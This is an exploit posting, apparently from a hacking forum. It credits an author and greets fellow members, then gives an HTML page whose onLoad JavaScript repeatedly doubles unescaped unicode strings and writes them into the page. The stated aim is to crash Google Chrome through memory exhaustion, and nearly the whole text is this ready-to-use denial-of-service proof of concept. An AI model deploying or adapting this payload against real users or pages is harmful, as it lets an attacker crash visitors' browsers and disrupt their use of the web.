|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69  |  /*   GGGGGG\   GG__GG\  GG /\__| aaaaaa\ rrrrrr\aaaaaa\ gggggg\ eeeeee\  GG |GGGG\\____aa\ rr__rr\ \____aa\ gg__gg\ ee__ee\   GG |\_GG | aaaaaaa |rr |\__|aaaaaaa |gg /gg |eeeeeeee |  GG |GG |aa__aa |rr | aa__aa |gg |gg |ee ____|  \GGGGGG|\aaaaaaa |rr | \aaaaaaa |\ggggggg |\eeeeeee\   \______/\_______|\__|\_______| \____gg | \_______|  gg\ gg |  gggggg|  Info-sec forum: http://garage4hackers.com [+] Google Chrome Denial Of Service (DoS) [+] Author: Prashant a.k.a t3rm!n4t0r [+] C0ntact: happyterminator@gmail.com [+] Platform: Windows, *nix [+] Tested on: Windows Server 2003, XP SP2, Ubuntu 10.04 [+] Special Greets to: "vinnu" and secfence team [+] Greets to: fb1h2s, b0nd, Eby, punter,godwin austin, the_empty, RD(Xer0), warrior, abhaythehero,d3c0d3r  all hackers garage crew :) */ <html> <title>DoS</title> <head> <script> function Lox()  { var longunistring1 = unescape("%u4141%u4141"); var longunistring2 = unescape("%u4242%u4242"); var longunistring3 = unescape("%u4343%u4343"); var longunistring4 = unescape("%u4444%u4444"); for(i=0; i <= 100 ; ++i)   { longunistring1+=longunistring1; longunistring2+=longunistring2; longunistring3+=longunistring3; longunistring4+=longunistring4; document.write(longunistring1); document.write(longunistring2); document.write(longunistring3); document.write(longunistring4); } document.write(longunistring1); document.write(longunistring2); document.write(longunistring3); document.write(longunistring4); } </script> </head> <body onLoad="Lox()"> </body> </html>  |